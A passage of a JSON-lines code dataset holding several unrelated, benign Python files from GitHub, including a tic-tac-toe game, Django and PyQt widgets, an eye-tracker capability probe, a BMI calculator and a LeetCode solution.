col_type in numerics:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n end_mem = df.memory_usage().sum() / 1024**2\n if verbose:\n logger.info('Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)'.format(\n end_mem, 100 * (start_mem - end_mem) / start_mem))\n return df\n\n\n\n","repo_name":"darknli/PackingGeneralML","sub_path":"gml/utils/reduce_memory.py","file_name":"reduce_memory.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10060880121","text":"from collections import namedtuple\r\nfrom io import open\r\n\r\ndef cargarRostros(archivo):\r\n archivo = open(\"rostros.txt\",\"r\") \r\n listarostro = [] #structure for the complete face, which is made up of 5 lines\r\n for lineadelarchivo in archivo: #iterate over the file\r\n lineadecodigo = lineadelarchivo.rstrip().split(',') #get the list of codes for each line\r\n listadelineas=[]\r\n for cadacodigo in lineadecodigo: #split the number from the character \r\n listadelineas.append(cadacodigo.split('\\t')) \r\n listarostro.append(lineadecodigo)\r\n return listarostro \r\n\r\n\r\ndef imprimir_rostro(rostro):\r\n for lineadelcodigo in rostro: #iterate over each line of the face\r\n for pardecodigo in lineadelcodigo: #iterate over each code in the line\r\n imprimir_linea(pardecodigo) #print the character a number of times\r\n print(\"\\n\")\r\n\r\n\r\ndef imprimir_linea(codigo):\r\n numero = int(codigo[0])\r\n caracter = str(codigo[1])\r\n for i in range(0,numero):\r\n print(caracter,end=\"\")\r\n\r\n\r\n\r\ndef elegirpelo(num):\r\n \r\n tipoPelo = namedtuple('TipoPelo',['Num','codigo','dibujo'])\r\n t1 = tipoPelo(1,'1 ,9W',' WWWWWWWWW')\r\n t2 = tipoPelo(2,'1 ,9|',' |||||||||')\r\n t3 = tipoPelo(3,'1 ,1|,7\",1|',' |\"\"\"\"\"\"\"|')\r\n t4 = tipoPelo(4,'1 ,3\\\\,6/',' \\\\\\//////')\r\n lista = [t1,t2,t3,t4]\r\n archivo = open(\"rostros.txt\",\"w\")\r\n archivo.write(lista[num-1][1])\r\n archivo.close()\r\n\r\n #print(lista[num-1][1])\r\n\r\n\r\ndef elegirojos(num):\r\n \r\n tipoOjos = namedtuple('TipoOjos',['Num','codigo','dibujo'])\r\n t1 = tipoOjos(1,'1 ,1|,2 ,1o,1 ,1o,2 ,1|',' | O O |')\r\n t2 = tipoOjos(2,'1 ,1|,1-,1(,1.,1 ,1.,1),1-,1|',' |-(. 
.)-|')\r\n t3 = tipoOjos(3,'1 ,1|,1-,1(,1o,1 ,1o,1),1-,1|',' |-(o o)-|')\r\n t4 = tipoOjos(4,'1 ,1|,2 ,1\\\\,1 ,1/,2 ,1|',' | \\ / |')\r\n lista = [t1,t2,t3,t4]\r\n archivo = open(\"rostros.txt\",\"a\")\r\n dibujito = \"\\n\" + lista[num-1][1]\r\n archivo.write(dibujito)\r\n archivo.close()\r\n\r\n\r\ndef elegirOrejasNariz(num):\r\n tipoOrena = namedtuple('TipoOjos',['Num','codigo','dibujo'])\r\n t1 = tipoOrena(1,'1@,4 ,1J,4 ,1@','@ J @')\r\n t2 = tipoOrena(2,'1{,4 ,1\",4 ,1}','{ \" }')\r\n t3 = tipoOrena(3,'1[,4 ,1j,4 ,1]','[ j ]')\r\n t4 = tipoOrena(4,'1<,4 ,1-,4 ,1>','< - >')\r\n lista = [t1,t2,t3,t4]\r\n archivo = open(\"rostros.txt\",\"a\")\r\n dibujito = \"\\n\" + lista[num-1][1]\r\n archivo.write(dibujito)\r\n archivo.close()\r\n\r\ndef elegirBoca(num):\r\n tipoBoca = namedtuple('TipoBoca',['Num','codigo','dibujo'])\r\n t1 = tipoBoca(1,'1 ,1|,2 ,3=,2 ,1|',' | === |')\r\n t2 = tipoBoca(2,'1 ,1|,3 ,1-,3 ,1|',' | - |')\r\n t3 = tipoBoca(3,'1 ,1|,2 ,3-,2 ,1|',' | --- |')\r\n t4 = tipoBoca(4,'1 ,1|,2 ,1\\,3-,1/,2 ,1|',' | \\---/ |')\r\n lista = [t1,t2,t3,t4]\r\n archivo = open(\"rostros.txt\",\"a\")\r\n dibujito = \"\\n\" + lista[num-1][1]\r\n archivo.write(dibujito)\r\n archivo.close()\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"Maximmxxii/RetosEnPython","sub_path":"ayudaR6.py","file_name":"ayudaR6.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11382347998","text":"from PyQt6.QtWidgets import QMainWindow, QWidget, QVBoxLayout, QHBoxLayout, QStackedWidget, QTabBar, QPushButton, \\\n QLabel, QGridLayout, QLineEdit, QTableWidget, QTableWidgetItem, QHeaderView\nfrom PyQt6.QtCharts import QChart, QChartView, QLineSeries, QValueAxis\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtGui import QDoubleValidator, QIntValidator, QValidator\n\nfrom import_page import *\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setWindowTitle(\"Single Cell Data Processor\")\n self.setMinimumSize(1005, 600)\n\n self.main_window = QWidget()\n self.main_layout = QVBoxLayout()\n self.main_window.setLayout(self.main_layout)\n self.setCentralWidget(self.main_window)\n\n self.tab_bar = QTabBar()\n tabs = [\"Current Data\", \"Histogram\", \"Consecutive Particles\", \"Corrected Particle Data\", \"Collected Data\"]\n for tab in tabs:\n self.tab_bar.addTab(tab)\n self.main_layout.addWidget(self.tab_bar)\n\n self.stack = QStackedWidget()\n\n # -------------------------------------------- Import Page --------------------------------------------\n\n self.import_tab = ImportPage()\n\n # ----------------------------------------Histogram Window-----------------------------------------------------\n\n self.histogram_window = QWidget()\n\n # ----------------------------------Consecutive Particles Window-----------------------------------------------\n\n self.consecutive_particles_window = QWidget()\n\n # --------------------------------------Particle Data Window---------------------------------------------------\n\n self.corrected_particle_data_window = QWidget()\n\n self.collected_data_window = QWidget()\n\n stack_widgets = [self.import_tab, self.histogram_window, self.consecutive_particles_window,\n self.corrected_particle_data_window, self.collected_data_window]\n for widget in stack_widgets:\n self.stack.addWidget(widget)\n\n self.main_layout.addWidget(self.stack)\n\n 
self.show()\n\n\n\n\n\n\n","repo_name":"ethomp49/single_cell","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36831033738","text":"import time\n\nimport hypercube\nimport argparse\nimport numpy as np\nimport tqdm\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog=\"rndgen\", description=\"generator of (bad) random numbers\")\n parser.add_argument('filename', help=\"name of file for writing random bytes\")\n parser.add_argument('-n', '--count', default=10000, help=\"number of bytes\", type=int)\n parser.add_argument('-d', '--dim', default=20, help=\"dimensionality\", type=int)\n parser.add_argument('-m', '--modify', nargs='*', help=\"modification of hypercube values, format: \\\"regex,delta\\\"\")\n\n args = parser.parse_args()\n #args = parser.parse_args([\"bad2.bin\", \"-m\",\".*0,1\"])\n H = hypercube.Hypercube(args.dim)\n\n #parsing --modify option\n patterns = []; deltas = []\n if args.modify is not None:\n print(args.modify)\n for modstr in args.modify:\n strlist = modstr.split(\",\")\n if len(strlist) != 2:\n raise ValueError(f\"incorrect value for --modify: {modstr}, it should contain two comma-separated fields\")\n patterns.append(strlist[0])\n deltas.append(float(strlist[1]))\n\n idx = H.sampleInitialIndex()\n\n for patternstr, delta in zip(patterns, deltas):\n H.modifyProbabilities(patternstr, delta)\n\n\n res = np.zeros(args.count*8, dtype=np.uint8)\n t1 = time.perf_counter()\n for n in tqdm.tqdm(range(args.count*8)):\n idx, bit = H.sampleNextBit(idx)\n res[n] = bit\n t2 = time.perf_counter()\n print(f\"Generating finished in {t2-t1} secs\")\n\n with open(args.filename, \"wb\") as f:\n f.write(np.packbits(res))\n\n\n\n\n\n","repo_name":"teaprof/hypercube","sub_path":"src/stattest/rndgen.py","file_name":"rndgen.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35316733283","text":"#!/usr/bin/env python\n#coding=utf-8\n\n\"\"\"\n.py:\n\"\"\"\n\n__author__ = \"Francisco Maria Calisto\"\n__maintainer__ = \"Francisco Maria Calisto\"\n__email__ = \"francisco.calisto@tecnico.ulisboa.pt\"\n__license__ = \"MIT\"\n__version__ = \"1.0.1\"\n__status__ = \"Development\"\n__copyright__ = \"Copyright 2019, Instituto Superior Técnico (IST)\"\n__credits__ = [\n \"Bruno Oliveira\",\n \"Carlos Santiago\",\n \"Jacinto C. 
Nascimento\",\n \"Pedro Miraldo\",\n \"Nuno Nunes\"\n]\n\nimport os\nimport sys\n\nfrom os import path\n\nimport tobii_research as tr\nimport time\n\n# The current folder path.\nbasePath = os.path.dirname(__file__)\n\n# The path to the repository \"src\" folder.\njoinPath = os.path.join(basePath, '..')\npathAbsPath = os.path.abspath(joinPath)\n# Add the directory containing the module to\n# the Python path (wants absolute paths).\nsys.path.append(pathAbsPath)\n\ndef find_eyetrackers_meta():\n found_eyetrackers = tr.find_all_eyetrackers()\n # available_eyetracker = found_eyetrackers[0]\n\n for available_eyetracker in found_eyetrackers:\n print(\"Address: \" + available_eyetracker.address)\n print(\"Model: \" + available_eyetracker.model)\n print(\"Name (It's OK if this is empty): \" + available_eyetracker.device_name)\n print(\"Serial number: \" + available_eyetracker.serial_number)\n\n if tr.CAPABILITY_CAN_SET_DISPLAY_AREA in available_eyetracker.device_capabilities:\n print(\"The display area can be set on the eye tracker.\")\n else:\n print(\"The display area can not be set on the eye tracker.\")\n if tr.CAPABILITY_HAS_EXTERNAL_SIGNAL in available_eyetracker.device_capabilities:\n print(\"The eye tracker can deliver an external signal stream.\")\n else:\n print(\"The eye tracker can not deliver an external signal stream.\")\n if tr.CAPABILITY_HAS_EYE_IMAGES in available_eyetracker.device_capabilities:\n print(\"The eye tracker can deliver an eye image stream.\")\n else:\n print(\"The eye tracker can not deliver an eye image stream.\")\n if tr.CAPABILITY_HAS_GAZE_DATA in available_eyetracker.device_capabilities:\n print(\"The eye tracker can deliver a gaze data stream.\")\n else:\n print(\"The eye tracker can not deliver a gaze data stream.\")\n if tr.CAPABILITY_HAS_HMD_GAZE_DATA in available_eyetracker.device_capabilities:\n print(\"The eye tracker can deliver a HMD gaze data stream.\")\n else:\n print(\"The eye tracker can not deliver a HMD gaze data stream.\")\n if tr.CAPABILITY_CAN_DO_SCREEN_BASED_CALIBRATION in available_eyetracker.device_capabilities:\n print(\"The eye tracker can do a screen based calibration.\")\n else:\n print(\"The eye tracker can not do a screen based calibration.\")\n if tr.CAPABILITY_CAN_DO_MONOCULAR_CALIBRATION in available_eyetracker.device_capabilities:\n print(\"The eye tracker can do a monocular calibration.\")\n else:\n print(\"The eye tracker can not do a monocular calibration.\")\n if tr.CAPABILITY_CAN_DO_HMD_BASED_CALIBRATION in available_eyetracker.device_capabilities:\n print(\"The eye tracker can do a HMD screen based calibration.\")\n else:\n print(\"The eye tracker can not do a HMD screen based calibration.\")\n if tr.CAPABILITY_HAS_HMD_LENS_CONFIG in available_eyetracker.device_capabilities:\n print(\"The eye tracker can get/set the HMD lens configuration.\")\n else:\n print(\"The eye tracker can not get/set the HMD lens configuration.\")\n\n return available_eyetracker\n\n# ==================== END File ==================== #\n","repo_name":"mida-project/eye-tracker-setup","sub_path":"src/methods/finders.py","file_name":"finders.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"19"} +{"seq_id":"5660029285","text":"# -*- mode: python; coding: utf-8; -*-\n\nfrom django import forms\nfrom django.utils.safestring import mark_safe\nfrom settings import DEFAULT_WIDTH,DEFAULT_HEIGHT,DEFAULT_LAT,DEFAULT_LNG\nfrom django.conf import settings\n\nclass 
LocationWidget(forms.TextInput):\n def __init__(self, *args, **kw):\n\n self.map_width = kw.pop(\"map_width\", DEFAULT_WIDTH)\n self.map_height = kw.pop(\"map_height\", DEFAULT_HEIGHT)\n\n super(LocationWidget, self).__init__(*args, **kw)\n self.inner_widget = forms.widgets.HiddenInput()\n #self.checkbox_widget = forms.widgets.CheckboxInput()\n\n def render(self, name, value, *args, **kwargs):\n if value is None:\n lat, lng = DEFAULT_LAT, DEFAULT_LNG\n else:\n if isinstance(value, unicode):\n a, b = value.split(',')\n else:\n a, b = value\n lat, lng = float(a), float(b)\n\n js = '''\n \n \n \n ''' % dict(name=name, lat=lat, lng=lng, media_path=settings.ADMIN_MEDIA_PREFIX )\n html = self.inner_widget.render(\"%s\" % name, \"%f,%f\" % (lat, lng), dict(id='id_%s' % name))\n #html += self.checkbox_widget.render(\"\", \"\",{\"onclick\":\"load_%s();\"%name})\n html += '
        ' % (name, self.map_width, self.map_height)\n\n return mark_safe(js + html)\n\n class Media:\n js = (\n 'http://maps.google.com/maps/api/js?sensor=false',\n )\n","repo_name":"coolchevy/django-googlemaps","sub_path":"googlemaps/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"36359928741","text":"from active_games import active_games\r\n\r\ndef is_bot(author_id, game_room):\r\n\tfor member in game_room.members:\r\n\t\tif member.id == author_id:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\nasync def is_open(ctx):\r\n if ctx.channel.id not in active_games:\r\n await ctx.send(\"시작한 게임이 존재하지 않습니다.\")\r\n return\r\n room_info = active_games[ctx.channel.id]['game_room']\r\n if not room_info.can_join:\r\n await ctx.send(\"참가가 이미 마감되었습니다.\")\r\n return\r\n if len(room_info.members) >= 10:\r\n await ctx.send(\"제한 인원(10명)을 초과하였습니다.\")\r\n return\r\n return room_info\r\n\r\nasync def add_role_in_active_roles(role, active_roles, game_room):\r\n if role not in active_roles:\r\n active_roles.append(role)\r\n await game_room.main_channel.send(f\"{role} 역할이 추가되었습니다.\")\r\n else:\r\n await game_room.main_channel.send(f\"{role}는(은) 이미 추가된 역할입니다.\")\r\n\r\nasync def remove_role_from_active_roles(role, active_roles, game_room):\r\n if role in active_roles:\r\n active_roles.remove(role)\r\n await game_room.main_channel.send(f\"{role} 역할이 삭제되었습니다.\")\r\n else:\r\n await game_room.main_channel.send(f\"{role}는(은) 추가되지 않은 역할입니다.\")\r\n\r\ndef get_current_game(user_id):\r\n for channel_id in active_games:\r\n for member in active_games[channel_id]['game_room'].members:\r\n if user_id == member.id:\r\n return active_games[channel_id]\r\n return None","repo_name":"AndroidNetrunner/resistance_avalon","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"74326945004","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import scrolledtext\nfrom tkinter import filedialog\n\nflag = False\n\n\nclass TicTacToeApp(Tk):\n def __init__(self):\n super().__init__()\n self.title(\"TicTacToe\")\n self.geometry(\"400x300\")\n self.buttons = []\n self.create_buttons()\n self.counter = 0\n self.tie = True\n screen_width = self.winfo_screenwidth()\n screen_height = self.winfo_screenheight()\n\n # Calculate the x and y coordinates to center the window\n x = (screen_width - self.winfo_reqwidth()) // 2\n y = (screen_height - self.winfo_reqheight()) // 3\n\n # Set the window geometry to be centered on the screen\n self.geometry(f\"+{x}+{y}\")\n\n def create_buttons(self):\n\n style = ttk.Style()\n style.configure(\"Custom.TButton\", font=(\"Roboto slab\", 28))\n for i in range(3):\n for j in range(3):\n index = i*3+j\n button = ttk.Button(\n self, text=\" \", command=lambda idx=index, r=i, c=j: self.button_pressed(idx, r, c), style=\"Custom.TButton\")\n\n button.grid(\n row=i, column=j, sticky=\"news\")\n\n self.buttons.append(button)\n\n for i in range(3):\n self.grid_columnconfigure(i, weight=1)\n for j in range(3):\n self.grid_rowconfigure(j, weight=1)\n\n def button_pressed(self, index, r, c):\n global flag\n\n if self.buttons[index][\"text\"] == \" \" and flag == False:\n flag = True\n self.buttons[index][\"text\"] = \"O\"\n self.buttons[index][\"state\"] = DISABLED\n self.counter += 1\n counter_row_O = 0\n for i in range(3):\n if 
self.buttons[r*3+i][\"text\"] == \"O\":\n counter_row_O += 1\n else:\n counter_row_O = 0\n\n counter_column_O = 0\n for j in range(3):\n if self.buttons[j*3+c][\"text\"] == \"O\":\n counter_column_O += 1\n else:\n counter_column_O = 0\n\n counter_diag_O = 0\n counter_diag2_O = 0\n for i in range(3):\n for j in range(3):\n if i == j:\n if self.buttons[i*3+j][\"text\"] == \"O\":\n counter_diag_O += 1\n else:\n counter_diag_O = 0\n if i+j == 2:\n if self.buttons[i*3+j][\"text\"] == \"O\":\n counter_diag2_O += 1\n else:\n counter_diag2_O = 0\n\n if counter_diag_O == 3 or counter_column_O == 3 or counter_row_O == 3 or counter_diag2_O == 3:\n self.print_the_winner(winner=\"O\")\n self.tie = False\n\n elif self.buttons[index][\"text\"] == \" \" and flag == True:\n flag = False\n self.counter += 1\n self.buttons[index][\"text\"] = \"X\"\n self.buttons[index][\"state\"] = DISABLED\n\n counter_row_X = 0\n for i in range(3):\n if self.buttons[r*3+i][\"text\"] == \"X\":\n counter_row_X += 1\n else:\n counter_row_X = 0\n\n counter_column_X = 0\n for j in range(3):\n if self.buttons[j*3+c][\"text\"] == \"X\":\n counter_column_X += 1\n else:\n counter_column_X = 0\n\n counter_diag_X = 0\n counter_diag2_X = 0\n for i in range(3):\n for j in range(3):\n if i == j:\n if self.buttons[i*3+j][\"text\"] == \"X\":\n counter_diag_X += 1\n else:\n counter_diag_X = 0\n if i+j == 2:\n if self.buttons[i*3+j][\"text\"] == \"X\":\n counter_diag2_X += 1\n else:\n counter_diag2_X = 0\n\n if counter_diag_X == 3 or counter_column_X == 3 or counter_row_X == 3 or counter_diag2_X == 3:\n self.print_the_winner(winner=\"X\")\n self.tie = False\n self.check_for_draw()\n\n def check_for_draw(self):\n\n print(self.counter)\n print(self.tie)\n if self.counter == 9 and self.tie:\n self.print_the_winner(winner=\"Tie\")\n\n def print_the_winner(self, winner):\n\n new_window = Toplevel(self)\n new_window.title(\"Winner tab\")\n new_window.grab_set()\n prev_x = self.winfo_x()\n prev_y = self.winfo_y()\n prev_width = self.winfo_width()\n prev_height = self.winfo_height()\n\n new_x = prev_x + (prev_width - new_window.winfo_reqwidth()) // 2\n new_y = prev_y + (prev_height - new_window.winfo_reqheight()) // 2\n\n # Place the new window at the calculated position\n new_window.geometry(f\"+{new_x}+{new_y}\")\n\n if winner != \"Tie\":\n label = ttk.Label(new_window, text=f\"The winner is {winner}\")\n label.pack()\n else:\n label = ttk.Label(new_window, text=\"It's a Tie\")\n label.pack()\n\n restart_button = ttk.Button(\n new_window, text=\"Restart\", command=self.restart)\n quit_button = ttk.Button(new_window, text=\"Quit\", command=self.quit)\n restart_button.pack()\n quit_button.pack()\n\n def restart(self):\n self.destroy()\n new_window = TicTacToeApp()\n new_window.mainloop()\n\n def quit(self):\n quit()\n\n\nif __name__ == '__main__':\n app = TicTacToeApp()\n app.mainloop()\n","repo_name":"nick796/Python_projects","sub_path":"Tic_tac_toe_app.py","file_name":"Tic_tac_toe_app.py","file_ext":"py","file_size_in_byte":5758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36538590464","text":"from rest_framework import serializers\n\nfrom about.models import StaticPage, Team\n\n\nclass StaticPageListSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for the list of static pages.\"\"\"\n\n class Meta:\n model = StaticPage\n fields = ['id', 'title', 'slug']\n\n\nclass StaticPageSerializer(StaticPageListSerializer):\n \"\"\"Serializer for a static page.\"\"\"\n\n class 
Meta(StaticPageListSerializer.Meta):\n fields = StaticPageListSerializer.Meta.fields + ['content']\n\n\nclass TeamSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for the team.\"\"\"\n\n class Meta:\n model = Team\n fields = (\n 'id',\n 'first_name',\n 'last_name',\n 'position',\n 'photo',\n 'phone',\n )\n","repo_name":"antaliadom-team/backend","sub_path":"api/serializers/about_serializers.py","file_name":"about_serializers.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10934702329","text":"import os\n\n\nclass Core:\n def info(self, zolo, module, args):\n \"\"\"\n Info about Core module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n print(f\"[Core] Version {module.version}\")\n\n def stop(self, zolo, module, args):\n \"\"\"\n Stop Zolo\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n zolo.stop()\n\n def dismodule(self, zolo, module, args):\n \"\"\"\n Deactivate a module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n if args:\n if zolo.has_module(args[0]):\n zolo.desactive_module(args[0])\n print(f\"[Core] Module {args[0]} désactivé\")\n else:\n print(\"[ERREUR] Module inconnu\")\n else:\n print(\"[ERREUR] Syntaxe : core dismodule \")\n\n def actmodule(self, zolo, module, args):\n \"\"\"\n Activate a module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n if args:\n if zolo.has_module(args[0]):\n zolo.active_module(args[0])\n print(f\"[Core] Module {args[0]} activé\")\n else:\n print(\"[ERREUR] Module inconnu\")\n else:\n print(\"[ERREUR] Syntaxe : core actmodule \")\n\n def modules(self, zolo, module, args):\n \"\"\"\n Show list of modules\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n print(\"[Core] Liste des modules :\")\n for i in zolo.get_all_modules():\n if i.name in zolo.get_config().disabled_modules:\n print(f\"[Core] - {i.name} (désactivé)\")\n else:\n print(f\"[Core] - {i.name}\")\n \n def load(self, zolo, module, args):\n \"\"\"\n Load a module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n if args:\n if zolo.has_module(args[0]):\n print(\"[ERREUR] Module déjà chargé\")\n elif zolo.load_module(args[0]):\n print(f\"[Core] Module {args[0]} chargé\")\n else:\n print(f\"[ERREUR] Le module {args[0]} n'a pas de fichier info.json\")\n else:\n print(\"[ERREUR] Syntaxe : core load \")\n \n def reload(self, zolo, module, args):\n \"\"\"\n Reload a module\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n if args:\n if zolo.has_module(args[0]):\n zolo.reload_module(args[0])\n print(f\"[Core] Module {args[0]} rechargé\")\n else:\n print(\"[ERREUR] Module inconnu\")\n else:\n print(\"[ERREUR] Syntaxe : core reload \")\n \n def reloadall(self, zolo, module, args):\n \"\"\"\n Reload all modules\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n print(\"[Core] Rechargement de tous les modules...\")\n for i in zolo.get_all_modules():\n zolo.reload_module(i)\n 
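# Editor's note (assumption): the reload command above passes a module name\n # (args[0]) to zolo.reload_module(), while this loop passes the Module object\n # itself; if reload_module() only accepts names, zolo.reload_module(i.name)\n # would be the safer call.\n 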
print(f\"[Core] Module {i.name} rechargé\")\n print(\"[Core] Modules rechargés\")\n \n def clear(self, zolo, module, args):\n \"\"\"\n Clear the Zolo terminal\n\n Args:\n zolo (Zolo): Zolo\n module (Module): Current Module\n args (list(string)): List of arguments of command\n \"\"\"\n os.system(\"cls\")\n","repo_name":"AlexisHuvier/Zolo","sub_path":"modules/Core/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74412419884","text":"# coding=utf-8\n\n\"\"\"\nYou have a long flowerbed in which some of the plots are planted, and some are not. However, flowers cannot be planted in adjacent plots.\n\nGiven an integer array flowerbed containing 0's and 1's, where 0 means empty and 1 means not empty, and an integer n, return if n new flowers can be planted in the flowerbed without violating the no-adjacent-flowers rule.\n\n \n\nExample 1:\n\nInput: flowerbed = [1,0,0,0,1], n = 1\nOutput: true\nExample 2:\n\nInput: flowerbed = [1,0,0,0,1], n = 2\nOutput: false\n \n\nConstraints:\n\n1 <= flowerbed.length <= 2 * 10^4\nflowerbed[i] is 0 or 1.\nThere are no two adjacent flowers in flowerbed.\n0 <= n <= flowerbed.length\n\"\"\"\n\nfrom typing import List  # needed for the List[int] annotation below\n\n\nclass Solution:\n def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:\n \"\"\"\n Simple greedy approach: plant a flower wherever it is allowed, otherwise keep trying later plots, until every plot has been tried.\n \"\"\"\n length = len(flowerbed)\n for i in range(length):\n # If enough flowers have already been planted, we can return True early\n if n <= 0:\n return True\n\n # If this plot is already planted, we cannot plant here again\n if flowerbed[i] == 1:\n continue\n\n # If the previous plot is planted, the current plot cannot be planted\n if i > 0 and flowerbed[i - 1] == 1:\n continue\n\n # If the next plot is planted, the current plot cannot be planted\n if i < length - 1 and flowerbed[i + 1] == 1:\n continue\n\n # Plant here and record it\n flowerbed[i] = 1\n n -= 1\n\n return n <= 0\n","repo_name":"xiang12835/python-learning","sub_path":"leetcode/greedy/605. Can Place Flowers.py","file_name":"605. 
Can Place Flowers.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"27058325777","text":"\nheightIN = float(input('Please enter your height in Inches: '))\nweightLB = float(input('Please enter your weight in Pounds: '))\n\n\ndef BMI (heightIN, weightLB):\n bmi = weightLB/(heightIN**2) * 703\n\n # half-open ranges so values such as 24.5 or 29.3 are still classified\n if bmi >= 19 and bmi < 25:\n return 'NORMAL', bmi\n\n elif bmi >= 25 and bmi < 30:\n return 'OVERWEIGHT', bmi\n\n elif bmi >= 30 and bmi <= 39:\n return 'OBESE', bmi\n\n elif bmi > 39:\n return 'MORBIDLY OBESE', bmi\n\n elif bmi < 19:\n return 'UNDERWEIGHT', bmi\n \n\nquote, bmi = BMI(heightIN, weightLB)\nprint('Your BMI is: {} and you are: {}' .format(bmi, quote))\n","repo_name":"AliACode/BMI-CALC---PY","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21544931370","text":"#!/usr/bin/python3\n# file: subprocess.py\n# Author: Nikhil Gorantla\n# Date: 14/Jan/2018\n# Description: This program shows how to run shell commands from Python using the subprocess module\n# Demonstrate piping out of a child process\n# Print names of files bigger than 1000 bytes\n\nfrom subprocess import Popen, PIPE\n\nlister = Popen([\"ls\", \"-l\"], stdout=PIPE)\n\nfor raw in lister.stdout: # renamed from 'bytes' to avoid shadowing the built-in\n line = raw.decode()\n if line.startswith(\"total\"):\n continue\n splitline = line.split()\n # Size is in field 4, name in field 8\n if int(splitline[4]) > 1000:\n print(splitline[8])","repo_name":"nikhilgorantla/pythonPrograming","sub_path":"21.subprocess.py","file_name":"21.subprocess.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33429520838","text":"from typing import List, Union\r\nfrom dataclasses import dataclass\r\nfrom abc import ABCMeta, abstractmethod\r\n\r\nfrom core import utils\r\n\r\n\r\nclass BaseNode(metaclass=ABCMeta):\r\n @abstractmethod\r\n def format(self) -> str:\r\n \"\"\"Format this Node as a string\"\"\"\r\n pass\r\n\r\n @abstractmethod\r\n def encode(self) -> bytes:\r\n \"\"\"Encode this Node into the corresponding raw protocol data\"\"\"\r\n pass\r\n\r\n @abstractmethod\r\n def from_raw(self, raw_data: bytes):\r\n \"\"\"Parse raw protocol data and return the corresponding Node object\"\"\"\r\n pass\r\n\r\n\r\n@dataclass\r\nclass TextNode(BaseNode):\r\n text: str\r\n\r\n def format(self) -> str:\r\n return self.text\r\n\r\n def encode(self) -> bytes:\r\n stream = utils.Stream()\r\n body = self.text.encode()\r\n\r\n stream.write_byte(0x01)\r\n stream.write_int16(len(body) + 3)\r\n stream.write_byte(0x01)\r\n stream.write_int16(len(body))\r\n stream.write(body)\r\n\r\n return stream.read_all()\r\n\r\n def from_raw(raw_data: bytes):\r\n stream = utils.Stream(raw_data)\r\n text = stream.del_left(1).read_token().decode()\r\n\r\n if len(stream._raw) > 0:\r\n return AtNode.from_raw(raw_data)\r\n\r\n return TextNode(text)\r\n\r\n\r\n@dataclass\r\nclass AtNode(BaseNode):\r\n uin: int\r\n name: str\r\n\r\n def format(self) -> str:\r\n return 